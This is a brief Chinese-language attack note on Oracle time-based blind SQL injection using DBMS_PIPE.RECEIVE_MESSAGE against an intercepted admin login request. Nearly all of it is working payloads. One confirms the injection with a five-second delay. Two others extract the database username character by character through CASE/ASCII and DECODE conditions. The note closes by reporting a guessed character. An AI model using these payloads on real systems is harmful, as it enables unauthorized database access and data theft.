oracle时间盲注DBMS_PIPE.RECEIVE_MESSAGE注入语句,
后台登录框抓包
利用 'and 1=(DBMS_PIPE.RECEIVE_MESSAGE('a',5)) and '1'='1 延时5秒判断注入点存在
利用 ' AND 7238=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1))>73) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(106)||CHR(72)||CHR(73),5) ELSE 7238 END) AND '1'='1
或者 'and 1=(select decode(substr(user,1,1),'I',DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) ,0) from dual) and '1'='1 这两条语句都可以猜解数据库用户名
数据库猜到第三位 I 延时5秒,